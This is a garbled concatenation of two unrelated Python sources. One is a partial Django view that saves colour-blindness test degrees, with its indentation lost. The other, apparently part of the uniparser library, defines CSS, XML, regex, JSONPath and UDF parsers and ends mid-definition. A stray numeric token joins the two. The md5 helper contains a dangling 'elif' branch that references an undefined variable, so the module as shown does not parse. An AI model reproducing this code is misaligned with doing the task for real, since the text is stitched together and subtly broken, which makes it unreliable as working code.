degrees: 测试程度,数组长度为3,其中idx为0 1 2 分别是 红 绿 蓝,根据当前测试程度赋值,
红色盲仅赋值degrees[0],以此类推
testType: 测试类型,0-红色盲,1-绿色盲,2-蓝色盲,3-红绿混合
userId: 用户ID
"""
def storeTestDegree(request):
userId = request.GET['userId']
testType = request.GET['testType']
degrees = request.GET['degrees']
print(type(degrees))
degrees = list(degrees.split(","))
print(type(degrees))
print(degrees)
# print(degrees, testType, userId)
# return HttpResponse("{} {} {}".format(degrees, testType, userId))
try:
temp = Test.objects.values().filter(userId=userId, testType=testType)
if temp:
temp.update(userId=userId, testType=testType,
degreeA=degrees[0], degreeB=degrees[1],
degreeC=degrees[2])
temp = temp[0]
print(temp)
print("Update OK")
else:
t = Test(userId=userId, testType=testType,
degreeA=degrees[0], degreeB=degrees[1],
degreeC=degrees[2])
print("Test created")
t.save()
print("Save OK")
except:
return HttpResponse("ERROR!")
return HttpResponse("YES")
# if request.method == 'POST':
# print("the POST method")
# concat = request.POST
# print(concat)
# # print(concat['username'])
#
# postBody = request.body
# print(type(postBody))
# print(postBody)
# print(degrees, testType, userId)
#
# return HttpResponse("YES!")
def storeTestFilter(t: Test):
    """Build a Filters row from a Test row.

    NOTE(review): this function looks unfinished — the Filters instance is
    never saved or returned, so calling it has no effect. Also, the locals
    ``id`` and ``type`` shadow Python builtins.
    """
    id = t.userId
    type = t.testType
    f = Filters(userId=id, filterType=type)
def getDefaultParams(request):
    """Return placeholder default filter parameters as JSON."""
    # TODO: look these values up in the database instead of hard-coding them.
    user_filter = [[2, 2], [3, 3]]
    return JsonResponse({"arr": user_filter})
def getUserFilterParams(request):
    """Return all Test rows for the requested user as JSON.

    Response ``message`` is "OK" (rows found), "Not Match" (no rows) or
    "ERROR" (database failure). NOTE(review): despite the name, this queries
    the Test model, not Filters (see the commented-out line) — confirm; the
    bare ``except:`` and debug prints should also be cleaned up.
    """
    # user_filter = get_object_or_404(Filters, pk=userId)
    userId = request.GET["userId"]
    print(userId)
    try:
        temp = Test.objects.values().filter(userId=userId)
        print(temp)
        if temp:
            temp = list(temp)
            print(temp)
            data = {
                "userFilterParams": temp,
                "message": "OK"
            }
        else:
            data = {
                "userFilterParams": [],
                "message": "Not Match"
            }
        print(data)
        return JsonResponse(data)
    except:
        data = {
            "userFilterParams": [],
            "message": "ERROR"
        }
        return JsonResponse(data)
15892288690 | # -*- coding: utf-8 -*-
import asyncio
import re
from abc import ABC, abstractmethod
from base64 import (b16decode, b16encode, b32decode, b32encode, b64decode,
b64encode, b85decode, b85encode)
from copy import deepcopy
from hashlib import md5 as _md5
from itertools import chain
from logging import getLogger
from re import compile as re_compile
from string import Template
from time import localtime, mktime, strftime, strptime, timezone
from typing import Any, Callable, Dict, List, Union
from .config import GlobalConfig
from .exceptions import InvalidSchemaError, UnknownParserNameError
from .utils import (AsyncRequestAdapter, InputCallbacks, NullContext,
SyncRequestAdapter, _lib, check_import, decode_as_base64,
encode_as_base64, ensure_await_result, ensure_request,
get_available_async_request, get_available_sync_request,
get_host, to_thread)
__all__ = [
'BaseParser', 'ParseRule', 'CrawlerRule', 'HostRule', 'CSSParser',
'SelectolaxParser', 'XMLParser', 'RegexParser', 'JSONPathParser',
'ObjectPathParser', 'JMESPathParser', 'PythonParser', 'UDFParser',
'LoaderParser', 'Uniparser'
]
logger = getLogger('uniparser')
def return_self(self, *args, **kwargs):
    """No-op operation: ignore any extra arguments and hand back *self* unchanged."""
    return self
def md5(string, n=32, encoding="utf-8", skip_encode=False):
    """str(obj) -> md5_string

    :param string: object to hash; stringified and encoded unless
        ``skip_encode`` is true (then it must already be bytes).
    :param n: length of the hex digest to return, or a (start, end) slice.

    >>> md5(1, 10)
    '923820dcc5'
    >>> md5('test')
    '098f6bcd4621d373cade4e832627b4f6'
    """
    if skip_encode:
        payload = string
    else:
        payload = str(string).encode(encoding)
    digest = _md5(payload).hexdigest()
    if n == 32:
        return digest
    if isinstance(n, (int, float)):
        # Take the centred n characters of the 32-character digest.
        return digest[(32 - n) // 2:(n - 32) // 2]
    if isinstance(n, (tuple, list)):
        return digest[n[0]:n[1]]
elif isinstance(n, (tuple, list)):
return _md5(todo).hexdigest()[n[0]:n[1]]
class BaseParser(ABC):
    """Sub class of BaseParser should have these features:
    Since most input object always should be string, _RECURSION_LIST will be True.
    1. class variable `name`
    2. `_parse` method
    3. use lazy import, maybe
    4. Parsers will recursion parse list of input_object if it can only parse `str` object.
    Test demo::
        def _partial_test_parser():
            from uniparser import Uniparser
            uni = Uniparser()
            args = [
                ['adcb', 'sort', ''],
            ]
            max_len = max([len(str(i)) for i in args])
            for i in args:
                print(f'{str(i):<{max_len}} => {uni.python.parse(*i)}')
    """
    test_url = 'https://github.com/ClericPy/uniparser'
    doc_url = 'https://github.com/ClericPy/uniparser'
    name = 'base'
    installed = True
    _RECURSION_LIST = True
    __slots__ = ()

    @abstractmethod
    def _parse(self, input_object, param, value):
        # Subclasses implement the actual parsing of a single input object.
        pass

    def parse(self, input_object, param, value):
        # Apply _parse element-wise when given a list (if the parser opts in
        # via _RECURSION_LIST), otherwise parse the object directly.
        try:
            if isinstance(input_object, list) and self._RECURSION_LIST:
                return [
                    self._parse(item, param, value) for item in input_object
                ]
            else:
                return self._parse(input_object, param, value)
        except GlobalConfig.SYSTEM_ERRORS:
            raise
        except Exception as err:
            # Deliberate design: parse errors are RETURNED (not raised) so a
            # parse chain can inspect/skip them downstream.
            # traceback.format_exception(None, e, e.__traceback__)
            return err

    @property
    def doc(self):
        # If need dynamic doc, overwrite this method.
        return f'{self.__class__.__doc__}\n\n{self.doc_url}\n\n{self.test_url}'

    def __call__(self, *args, **kwargs):
        # Make parser instances directly callable as parse().
        return self.parse(*args, **kwargs)
class CSSParser(BaseParser):
    """CSS selector parser, requires `bs4` and `lxml`(optional).
    Since HTML input object always should be string, _RECURSION_LIST will be True.
    Parse the input object with standard css selector, features from `BeautifulSoup`.
    :param input_object: input object, could be Tag or str.
    :type input_object: [Tag, str]
    :param param: css selector path
    :type param: [str]
    :param value: operation for each item of result
    :type value: [str]
        @attribute: return element.get(xxx)
        $text: return element.text
        $innerHTML, $html: return element.decode_contents()
        $outerHTML, $string: return str(element)
        $self: return element
    :return: list of Tag / str
    :rtype: List[Union[str, Tag]]
    examples:
        ['<a class="url" href="/">title</a>', 'a.url', '@href'] => ['/']
        ['<a class="url" href="/">title</a>', 'a.url', '$text'] => ['title']
        ['<a class="url" href="/">title</a>', 'a.url', '$innerHTML'] => ['title']
        ['<a class="url" href="/">title</a>', 'a.url', '$html'] => ['title']
        ['<a class="url" href="/">title</a>', 'a.url', '$outerHTML'] => ['<a class="url" href="/">title</a>']
        ['<a class="url" href="/">title</a>', 'a.url', '$string'] => ['<a class="url" href="/">title</a>']
        ['<a class="url" href="/">title</a>', 'a.url', '$self'] => [<a class="url" href="/">title</a>]
    WARNING: $self returns the original Tag object
    """
    name = 'css'
    doc_url = 'https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Selectors'
    installed = check_import('bs4')
    # Map of value -> extraction callable applied to each matched element.
    # NOTE(review): the '@attr' entry calls element.get() with no argument and
    # is never reached — '@'-prefixed values are special-cased in _parse below.
    operations = {
        '@attr': lambda element: element.get(),
        '$text': lambda element: element.text,
        '$innerHTML': lambda element: element.decode_contents(),
        '$html': lambda element: element.decode_contents(),
        '$outerHTML': lambda element: str(element),
        '$string': lambda element: str(element),
        '$self': return_self,
    }

    @property
    def doc(self):
        # Class docstring plus the valid operation keys (runtime-exposed).
        return f'{self.__class__.__doc__}\n\nvalid value args: {list(self.operations.keys())}\n\n{self.doc_url}\n\n{self.test_url}'

    def _parse(self, input_object, param, value):
        result = []
        if not input_object:
            return result
        # ensure input_object is instance of BeautifulSoup
        if not isinstance(input_object, _lib.Tag):
            # Prefer the faster lxml backend when it is importable.
            if check_import('lxml'):
                input_object = _lib.BeautifulSoup(input_object, 'lxml')
            else:
                input_object = _lib.BeautifulSoup(input_object, 'html.parser')
        if value.startswith('@'):
            # '@name' -> extract that attribute from every match (None if absent).
            result = [
                item.get(value[1:], None) for item in input_object.select(param)
            ]
        else:
            # '$...' operations; unknown values fall back to returning the Tag.
            operate = self.operations.get(value, return_self)
            result = [operate(item) for item in input_object.select(param)]
        return result
class CSSSingleParser(CSSParser):
    """Similar to CSSParser but use select_one instead of select method.
    examples:
        ['<a class="url" href="/">title</a>', 'a.url1', '@href'] => None
        ['<a class="url" href="/">title</a>', 'a.url', '@href'] => '/'
        ['<a class="url" href="/">title</a>', 'a.url', '$text'] => 'title'
        ['<a class="url" href="/">title</a>', 'a.url', '$innerHTML'] => 'title'
        ['<a class="url" href="/">title</a>', 'a.url', '$html'] => 'title'
        ['<a class="url" href="/">title</a>', 'a.url', '$outerHTML'] => '<a class="url" href="/">title</a>'
        ['<a class="url" href="/">title</a>', 'a.url', '$string'] => '<a class="url" href="/">title</a>'
        ['<a class="url" href="/">title</a>', 'a.url', '$self'] => <a class="url" href="/">title</a>
    """
    name = 'css1'

    def _parse(self, input_object, param, value):
        # Returns a single value (or None when the selector matches nothing),
        # unlike CSSParser which always returns a list.
        result = []
        if not input_object:
            return result
        # ensure input_object is instance of BeautifulSoup
        if not isinstance(input_object, _lib.Tag):
            if check_import('lxml'):
                input_object = _lib.BeautifulSoup(input_object, 'lxml')
            else:
                input_object = _lib.BeautifulSoup(input_object, 'html.parser')
        item = input_object.select_one(param)
        if item is None:
            return None
        if value.startswith('@'):
            # '@name' -> that attribute of the single match.
            return item.get(value[1:], None)
        operate = self.operations.get(value, return_self)
        return operate(item)
class SelectolaxParser(BaseParser):
    """CSS selector parser based on `selectolax`, faster than lxml.
    Since HTML input object always should be string, _RECURSION_LIST will be True.
    Parse the input object with standard css selector.
    :param input_object: input object, could be Node or str.
    :type input_object: [Node, str]
    :param param: css selector path
    :type param: [str]
    :param value: operation for each item of result
    :type value: [str]
        @attribute: return element.attributes.get(xxx)
        $text: return element.text
        $outerHTML, $html: return element.html
        $self: return element
    :return: list of Node / str
    :rtype: List[Union[str, Node]]
    examples:
        ['<a class="url" href="/">title</a>', 'a.url', '@href'] => ['/']
        ['<a class="url" href="/">title</a>', 'a.url', '$text'] => ['title']
        ['<a class="url" href="/">title</a>', 'a.url', '$string'] => ['<a class="url" href="/">title</a>']
        ['<a class="url" href="/">title</a>', 'a.url', '$outerHTML'] => ['<a class="url" href="/">title</a>']
        ['<a class="url" href="/">title</a>', 'a.url', '$self'] => [<a class="url" href="/">title</a>]
        ['<div>a <b>b</b> c</div>', 'div', '$html'] => ['a <b>b</b> c']
        ['<div>a <b>b</b> c</div>', 'div', '$innerHTML'] => ['a <b>b</b> c']
    WARNING: $self returns the original Node object
    """
    name = 'selectolax'
    doc_url = 'https://github.com/rushter/selectolax'
    installed = check_import('selectolax')

    # Plain helper (not a method): concatenate the HTML of a node's children,
    # i.e. the selectolax equivalent of innerHTML.
    def get_inner_html(element):
        result = []
        element = element.child
        while element:
            result.append(element.html)
            element = element.next
        return ''.join(result)

    # Map of value -> extraction callable applied to each matched node.
    # NOTE(review): the '@attr' entry calls .get(...) with a literal Ellipsis
    # and is never reached — '@'-prefixed values are special-cased in _parse.
    operations = {
        '@attr': lambda element: element.attributes.get(...),
        '$text': lambda element: element.text(),
        '$html': get_inner_html,
        '$innerHTML': get_inner_html,
        '$string': lambda element: element.html,
        '$outerHTML': lambda element: element.html,
        '$self': return_self,
    }

    @property
    def doc(self):
        # Class docstring plus the valid operation keys (runtime-exposed).
        return f'{self.__class__.__doc__}\n\nvalid value args: {list(self.operations.keys())}\n\n{self.doc_url}\n\n{self.test_url}'

    def _parse(self, input_object, param, value):
        result = []
        if not input_object:
            return result
        # ensure input_object is instance of Node
        if not isinstance(input_object, (_lib.Node, _lib.HTMLParser)):
            input_object = _lib.HTMLParser(input_object)
        if value.startswith('@'):
            # '@name' -> extract that attribute from every match (None if absent).
            result = [
                item.attributes.get(value[1:], None)
                for item in input_object.css(param)
            ]
        else:
            # '$...' operations; unknown values fall back to returning the Node.
            operate = self.operations.get(value, return_self)
            result = [operate(item) for item in input_object.css(param)]
        return result
class SelectolaxSingleParser(SelectolaxParser):
    """Similar to SelectolaxParser but use css_first instead of select method.
    examples:
        ['<a class="url" href="/">title</a>', 'a.url1', '@href'] => None
        ['<a class="url" href="/">title</a>', 'a.url', '@href'] => '/'
        ['<a class="url" href="/">title</a>', 'a.url', '$text'] => 'title'
        ['<a class="url" href="/">title</a>', 'a.url', '$innerHTML'] => 'title'
        ['<a class="url" href="/">title</a>', 'a.url', '$html'] => 'title'
        ['<a class="url" href="/">title</a>', 'a.url', '$outerHTML'] => '<a class="url" href="/">title</a>'
        ['<a class="url" href="/">title</a>', 'a.url', '$string'] => '<a class="url" href="/">title</a>'
        ['<a class="url" href="/">title</a>', 'a.url', '$self'] => <a class="url" href="/">title</a>
    """
    name = 'se1'

    def _parse(self, input_object, param, value):
        result = []
        if not input_object:
            return result
        # ensure input_object is instance of Node
        if not isinstance(input_object, (_lib.Node, _lib.HTMLParser)):
            input_object = _lib.HTMLParser(input_object)
        item = input_object.css_first(param)
        if item is None:
            # NOTE(review): returns '' on a miss, while the docstring example
            # and CSSSingleParser return None — confirm which is intended.
            return ''
        if value.startswith('@'):
            # '@name' -> that attribute of the single match.
            return item.attributes.get(value[1:], None)
        operate = self.operations.get(value, return_self)
        return operate(item)
class XMLParser(BaseParser):
    """XML parser, requires `bs4` and `lxml`(necessary), but not support `xpath` for now.
    Since XML input object always should be string, _RECURSION_LIST will be True.
    Parse the input object with css selector, `BeautifulSoup` with features='xml'.
    :param input_object: input object, could be Tag or str.
    :type input_object: [Tag, str]
    :param param: css selector path
    :type param: [str]
    :param value: operation for each item of result
    :type value: [str]
        @attribute: return element.get(xxx)
        $text: return element.text
        $innerXML: return element.decode_contents()
        $outerXML: return str(element)
        $self: return element
    :return: list of Tag / str
    :rtype: List[Union[str, Tag]]
    examples:
        ['<dc:creator><![CDATA[author]]></dc:creator>', 'creator', '$text'] => ['author']
    WARNING: $self returns the original Tag object
    """
    name = 'xml'
    doc_url = 'https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Selectors'
    installed = check_import('lxml') and check_import('bs4')
    # Map of value -> extraction callable applied to each matched element.
    # NOTE(review): the '@attr' entry calls element.get() with no argument and
    # is never reached — '@'-prefixed values are special-cased in _parse below.
    operations = {
        '@attr': lambda element: element.get(),
        '$text': lambda element: element.text,
        '$innerXML': lambda element: element.decode_contents(),
        '$outerXML': lambda element: str(element),
        '$self': return_self,
    }

    @property
    def doc(self):
        # Class docstring plus the valid operation keys (runtime-exposed).
        return f'{self.__class__.__doc__}\n\nvalid value args: {list(self.operations.keys())}\n\n{self.doc_url}\n\n{self.test_url}'

    def _parse(self, input_object, param, value):
        result = []
        if not input_object:
            return result
        # ensure input_object is instance of BeautifulSoup
        if not isinstance(input_object, _lib.Tag):
            # 'lxml-xml' enables the XML feature set (namespaces, CDATA).
            input_object = _lib.BeautifulSoup(input_object, 'lxml-xml')
        if value.startswith('@'):
            # '@name' -> extract that attribute from every match (None if absent).
            result = [
                item.get(value[1:], None) for item in input_object.select(param)
            ]
        else:
            operate = self.operations.get(value, return_self)
            result = [operate(item) for item in input_object.select(param)]
        return result
class RegexParser(BaseParser):
    """Regex parser built on the stdlib `re` module.
    Input objects are always strings, so _RECURSION_LIST stays True.
    :param input_object: the string to run the pattern against
    :type input_object: [str]
    :param param: standard regex
    :type param: [str]
    :param value: operation selector applied to the match result
    :type value: [str]
        @some string: using re.sub
        $0: re.finditer and return list of the whole matched string
        $1: re.finditer, $1 means return list of group 1
        '': null str, means using re.findall method
        -: return re.split(param, input_object)
        #: return re.search(param, input_object).group(int(value[1:])), return '' if not matched.
    :return: list of str
    :rtype: List[Union[str]]
    examples:
        ['a a b b c c', 'a|c', '@b'] => 'b b b b b b'
        ['a a b b c c', 'a', ''] => ['a', 'a']
        ['a a b b c c', 'a (a b)', '$0'] => ['a a b']
        ['a a b b c c', 'a (a b)', '$1'] => ['a b']
        ['a a b b c c', 'b', '-'] => ['a a ', ' ', ' c c']
        ['abcd', '(b.)d', '#0'] => 'bcd'
        ['abcd', '(b.)', '#1'] => 'bc'
        ['abcd', '(b.)', '#2'] => ''
        ['abcd', '.(?:d)', '#0'] => 'cd'
        ['abcd', '.(?:d)', '#1'] => ''
        ['abcd', '.(?<=c).', '#0'] => 'cd'
        ['abcd', '.(?<=c).', '#1'] => ''
    """
    name = 're'
    test_url = 'https://regex101.com/'
    doc_url = 'https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expression-language-quick-reference'
    VALID_VALUE_PATTERN = re_compile(r'^@|^\$\d+|^-$|^#\d+')
    def _parse(self, input_object, param, value):
        msg = f'input_object type should be str, but given {repr(input_object)[:30]}'
        assert isinstance(input_object, str), ValueError(msg)
        assert self.VALID_VALUE_PATTERN.match(value) or not value, ValueError(
            r'args1 should match ^@|^\$\d+|^-$|^#\d+')
        pattern = re_compile(param)
        if not value:
            # empty value means plain findall
            return pattern.findall(input_object)
        mode, arg = value[0], value[1:]
        if mode == '@':
            # substitution: replace every match with `arg`
            return pattern.sub(arg, input_object)
        if mode == '$':
            # collect group N from every match
            return [
                found.group(int(arg))
                for found in pattern.finditer(input_object)
            ]
        if mode == '-':
            return pattern.split(input_object)
        if mode == '#':
            # first match only; '' when nothing matched or the group is absent
            found = pattern.search(input_object)
            if not found:
                return ''
            group_index = int(arg) if arg.isdigit() else 1
            try:
                return found.group(group_index)
            except IndexError:
                return ""
class JSONPathParser(BaseParser):
    """JSONPath parser backed by the `jsonpath-rw-ext` library.
    JSON input may already be a dict / list, so _RECURSION_LIST is False.
    :param input_object: input object, could be str, list, dict.
    :type input_object: [str, list, dict]
    :param param: JSON path
    :type param: [str]
    :param value: attribute of find result, default to '' as '$value'
    :type value: [str, None]
    :return: list of str
    :rtype: List[Union[str]]
    examples:
        [{'a': {'b': {'c': 1}}}, '$..c', ''] => [1]
    """
    name = 'jsonpath'
    doc_url = 'https://github.com/sileht/python-jsonpath-rw-ext'
    test_url = 'https://jsonpath.com/'
    installed = check_import('jsonpath_rw_ext')
    _RECURSION_LIST = False
    def _parse(self, input_object, param, value=''):
        if isinstance(input_object, str):
            input_object = GlobalConfig.json_loads(input_object)
        # '$value' is the default attribute name; strip the leading '$'
        attr_name = (value or '$value')[1:]
        if param.startswith('JSON.'):
            param = '$%s' % param[4:]
        # prefer a pre-compiled expression (CompiledString.code) when present
        expr = getattr(param, 'code', _lib.jp_parse(param))
        return [
            getattr(found, attr_name, found.value)
            for found in expr.find(input_object)
        ]
class ObjectPathParser(BaseParser):
    """ObjectPath parser backed by the `objectpath` library.
    JSON input may already be a dict / list, so _RECURSION_LIST is False.
    :param input_object: input object, could be str, list, dict.
    :type input_object: [str, list, dict]
    :param param: ObjectPath
    :type param: [str]
    :param value: not to use
    :type value: [Any]
    examples:
        [{'a': {'b': {'c': 1}}}, '$..c', ''] => [1]
    """
    name = 'objectpath'
    doc_url = 'http://github.com/adriank/ObjectPath'
    test_url = 'http://objectpath.org/'
    installed = check_import('objectpath')
    _RECURSION_LIST = False
    ITER_TYPES_TUPLE = tuple(_lib.ITER_TYPES)
    def _parse(self, input_object, param, value=''):
        if isinstance(input_object, str):
            input_object = GlobalConfig.json_loads(input_object)
        if param.startswith('JSON.'):
            param = '$%s' % param[4:]
        found = _lib.OP_Tree(input_object).execute(param)
        # objectpath may return a generator; materialize it into a list
        if isinstance(found, self.ITER_TYPES_TUPLE):
            return list(found)
        return found
class JMESPathParser(BaseParser):
    """JMESPath parser backed by the `jmespath` library.
    JSON input may already be a dict / list, so _RECURSION_LIST is False.
    :param input_object: input object, could be str, list, dict.
    :type input_object: [str, list, dict]
    :param param: JMESPath
    :type param: [str]
    :param value: not to use
    :type value: [Any]
    examples:
        [{'a': {'b': {'c': 1}}}, 'a.b.c', ''] => 1
    """
    name = 'jmespath'
    doc_url = 'https://github.com/jmespath/jmespath.py'
    test_url = 'http://jmespath.org/'
    installed = check_import('jmespath')
    _RECURSION_LIST = False
    def _parse(self, input_object, param, value=''):
        if isinstance(input_object, str):
            input_object = GlobalConfig.json_loads(input_object)
        # reuse a pre-compiled expression (CompiledString.code) when available
        compiled = getattr(param, 'code', _lib.jmespath_compile(param))
        return compiled.search(input_object)
class UDFParser(BaseParser):
    """UDFParser. Python source code snippets. globals will contain `input_object` and `context` variables.
    Since python input object may be any type, _RECURSION_LIST will be False.
    param & value:
        param: the python source code to be exec(param), either have the function named `parse`, or will return eval(param)
        value: will be renamed to `context`, which can be used in parser function. `value` often be set as the dict of request & response.
    examples:
        ['a b c d', 'input_object[::-1]', ''] => 'd c b a'
        ['a b c d', 'context["key"]', {'key': 'value'}] => 'value'
        ['a b c d', 'md5(input_object)', ''] => '713f592bd537f7725d491a03e837d64a'
        ['["string"]', 'json_loads(input_object)', ''] => ['string']
        ['["string"]', 'json_loads(obj)', ''] => ['string']
        [['string'], 'json_dumps(input_object)', ''] => '["string"]'
        ['a b c d', 'parse = lambda input_object: input_object', ''] => 'a b c d'
        ['a b c d', 'def parse(input_object): context["key"]="new";return context', {'key': 'old'}] => {'key': 'new'}
    """
    name = 'udf'
    doc_url = 'https://docs.python.org/3/'
    # able to import other libs
    _ALLOW_IMPORT = True
    # strict protection: shadow dangerous builtins inside the UDF namespace
    # (NotImplemented is not callable, so calling them fails fast)
    _FORBIDDEN_FUNCS = {
        "input": NotImplemented,
        "open": NotImplemented,
        "eval": NotImplemented,
        "exec": NotImplemented,
    }
    # Differ from others, treat list as list object
    _RECURSION_LIST = False
    # for udf globals, here could save some module can be used, such as: _GLOBALS_ARGS = {'requests': requests}
    _GLOBALS_ARGS = {
        'md5': md5,
        'json_loads': GlobalConfig.json_loads,
        'json_dumps': GlobalConfig.json_dumps,
        're': re,
        'encode_as_base64': encode_as_base64,
        'decode_as_base64': decode_as_base64,
    }
    @property
    def doc(self):
        return f'{self.__class__.__doc__}\n\n_GLOBALS_ARGS: {list(self._GLOBALS_ARGS.keys())}\n\n{self.doc_url}\n\n{self.test_url}'
    @staticmethod
    def get_code_mode(code):
        # Decide how to run the snippet: `exec` when it defines a `parse`
        # callable (via def / lambda), `eval` for a plain expression.
        if isinstance(code, CompiledString):
            return code.operator
        if 'parse' in code and ('lambda' in code or 'def ' in code):
            return exec
        else:
            return eval
    def _parse(self, input_object, param, value=""):
        # context could be any type, if string, will try to json.loads
        # if value is null, will use the context dict from CrawlerRule & ParseRule
        if value and isinstance(value, str):
            try:
                context = GlobalConfig.json_loads(value)
            except GlobalConfig.JSONDecodeError:
                context = {}
        else:
            context = value or {}
        if not self._ALLOW_IMPORT and 'import' in param:
            raise RuntimeError(
                'UDFParser._ALLOW_IMPORT is False, so source code should not has `import` strictly. If you really want it, set `UDFParser._ALLOW_IMPORT = True` manually'
            )
        # obj is an alias for input_object
        local_vars = {
            'input_object': input_object,
            'context': context,
            'obj': input_object,
        }
        local_vars.update(self._FORBIDDEN_FUNCS)
        local_vars.update(self._GLOBALS_ARGS)
        # context['locals'] lets callers inject extra names into the UDF scope
        context_locals = context.get('locals')
        if context_locals:
            local_vars.update(context_locals)
        # run code
        # prefer the pre-compiled code object (CompiledString.code) when present
        code = getattr(param, 'code', param)
        if self.get_code_mode(param) is exec:
            exec(code, local_vars, local_vars)
            parse_function = local_vars.get('parse')
            if not parse_function:
                raise ValueError(
                    'UDF snippet should have a function named `parse`')
            return parse_function(input_object)
        else:
            return eval(code, local_vars, local_vars)
class PythonParser(BaseParser):
    r"""PythonParser. Some frequently-used utils.
    Since python input object may be any type, _RECURSION_LIST will be False.
    :param input_object: input object, any object.
    :type input_object: [object]
    param & value:
        1.  param: getitem, alias to get
            value: could be [0] as index, [1:3] as slice, ['key'] for dict
        2.  param: split
            value: return input_object.split(value or None)
        3.  param: join
            value: return value.join(input_object)
        4.  param: chain
            value: nonsense `value` variable. return list(itertools.chain(*input_object))
        5.  param: const
            value: return value if value else input_object.
        6.  param: template
            value: Template.safe_substitute(input_object=input_object, **input_object if isinstance(input_object, dict))
        7.  param: index
            value: value can be number string / key.
        8.  param: sort
            value: value can be asc (default) / desc.
        9.  param: strip
            value: chars. return str(input_object).strip(value)
        10. param: base64_encode, base64_decode
            from string to string.
        11. param: a number for index, will try to get input_object.__getitem__(int(param))
            value: default string
            similar to `param=default` if param is 0
            If not param, return value. (like `const`)
    examples:
        [[1, 2, 3], 'getitem', '[-1]'] => 3
        [[1, 2, 3], 'getitem', '[:2]'] => [1, 2]
        ['abc', 'getitem', '[::-1]'] => 'cba'
        [{'a': '1'}, 'getitem', 'a'] => '1'
        [{'a': '1'}, 'get', 'a'] => '1'
        ['a b\tc \n \td', 'split', ''] => ['a', 'b', 'c', 'd']
        [['a', 'b', 'c', 'd'], 'join', ''] => 'abcd'
        [['aaa', ['b'], ['c', 'd']], 'chain', ''] => ['a', 'a', 'a', 'b', 'c', 'd']
        ['python', 'template', '1 $input_object 2'] => '1 python 2'
        [[1], 'index', '0'] => 1
        ['python', 'index', '-1'] => 'n'
        [{'a': '1'}, 'index', 'a'] => '1'
        ['adcb', 'sort', ''] => ['a', 'b', 'c', 'd']
        [[1, 3, 2, 4], 'sort', 'desc'] => [4, 3, 2, 1]
        ['aabbcc', 'strip', 'a'] => 'bbcc'
        ['aabbcc', 'strip', 'ac'] => 'bb'
        [' \t a ', 'strip', ''] => 'a'
        ['a', 'default', 'b'] => 'a'
        ['', 'default', 'b'] => 'b'
        [' ', 'default', 'b'] => 'b'
        ['a', 'base64_encode', ''] => 'YQ=='
        ['YQ==', 'base64_decode', ''] => 'a'
        ['a', '0', 'b'] => 'a'
        ['', '0', 'b'] => 'b'
        [None, '0', 'b'] => 'b'
        [{0: 'a'}, '0', 'a'] => 'a'
        [{0: 'a'}, '', 'abc'] => 'abc'
    """
    name = 'python'
    doc_url = 'https://docs.python.org/3/'
    # Differ from others, treat list as list object
    _RECURSION_LIST = False
    def __init__(self):
        # dispatch table: param name -> handler(input_object, param, value)
        self.param_functions = {
            'getitem': self._handle_getitem,
            'get': self._handle_getitem,
            'split': lambda input_object, param, value: input_object.split(
                value or None),
            'join': lambda input_object, param, value: value.join(input_object),
            'chain': lambda input_object, param, value: list(
                chain(*input_object)),
            'const': lambda input_object, param, value: value or input_object,
            'template': self._handle_template,
            'index': lambda input_object, param, value: input_object[int(
                value) if (value.isdigit() or value.startswith('-') and value[
                    1:].isdigit()) else value],
            'sort': lambda input_object, param, value: sorted(
                input_object,
                reverse=(True if value.lower() == 'desc' else False)),
            'strip': self._handle_strip,
            'default': self._handle_default,
            'base64_encode': self._handle_base64_encode,
            'base64_decode': self._handle_base64_decode,
        }
    @property
    def doc(self):
        return f'{self.__class__.__doc__}\n\nvalid param args: {list(self.param_functions.keys())}\n\n{self.doc_url}\n\n{self.test_url}'
    def _handle_index(self, input_object, param, value):
        # numeric param used as an index; any lookup failure -> default value
        try:
            return input_object[int(param)]
        except (IndexError, ValueError, KeyError, TypeError):
            return value
    def _handle_others(self, input_object, param, value):
        # fallback for params that are not registered handler names
        if param.isdigit():
            return self._handle_index(input_object, param, value)
        else:
            # NOTE(review): negative numeric params (e.g. '-1') are not
            # digits, so they land here and behave like `const`
            return value or input_object
    def _parse(self, input_object, param, value):
        function = self.param_functions.get(param, self._handle_others)
        return function(input_object, param, value)
    def _handle_strip(self, input_object, param, value):
        # empty value strips whitespace (str.strip(None))
        return str(input_object).strip(value or None)
    def _handle_base64_encode(self, input_object, param, value):
        return encode_as_base64(str(input_object))
    def _handle_base64_decode(self, input_object, param, value):
        return decode_as_base64(str(input_object))
    def _handle_default(self, input_object, param, value):
        # strings are considered empty when whitespace-only
        if isinstance(input_object, str):
            if input_object.strip():
                return input_object
            else:
                return value
        elif input_object:
            return input_object
        else:
            return value
    def _handle_template(self, input_object, param, value):
        # dict inputs also expose their keys as template variables
        if isinstance(input_object, dict):
            return Template(value).safe_substitute(input_object=input_object,
                                                   obj=input_object,
                                                   **input_object)
        else:
            return Template(value).safe_substitute(input_object=input_object,
                                                   obj=input_object)
    def _handle_getitem(self, input_object, param, value):
        if value and (value[0], value[-1]) == ('[', ']'):
            value = value[1:-1]
            if ':' in value:
                # as slice
                start, stop = value.split(':', 1)
                if ':' in stop:
                    stop, step = stop.split(':')
                else:
                    step = None
                start = int(start) if start else None
                stop = int(stop) if stop else None
                step = int(step) if step else None
                key = slice(start, stop, step)
            else:
                # as index
                key = int(value)
            return input_object[key]
        else:
            # bare value: treat it as a plain (e.g. dict) key
            return input_object[value]
class LoaderParser(BaseParser):
    """LoaderParser. Loads string with json / yaml / toml standard format.
    And also b16decode, b16encode, b32decode, b32encode, b64decode, b64encode, b85decode, b85encode.
    Since input object should be string, _RECURSION_LIST will be True.
    :param input_object: str match format of json / yaml / toml
    :type input_object: [str]
    :param param: loader name, such as: json, yaml, toml
    :type param: [str]
    :param value: some kwargs, input as json string
    :type value: [str]
    examples:
        ['{"a": "b"}', 'json', ''] => {'a': 'b'}
        ['a = "a"', 'toml', ''] => {'a': 'a'}
        ['animal: pets', 'yaml', ''] => {'animal': 'pets'}
        ['a', 'b64encode', ''] => 'YQ=='
        ['YQ==', 'b64decode', ''] => 'a'
    """
    name = 'loader'
    _RECURSION_LIST = True
    def __init__(self):
        def text_codec(func):
            # Wrap a bytes->bytes base-N codec so it maps str -> str, using
            # GlobalConfig.__encoding__ (looked up at call time) at both ends.
            def _codec(input_object):
                return func(
                    input_object.encode(GlobalConfig.__encoding__)).decode(
                        GlobalConfig.__encoding__)
            return _codec
        self.loaders = {
            'json': GlobalConfig.json_loads,
            'toml': _lib.toml_loads,
            'yaml': _lib.yaml_full_load,
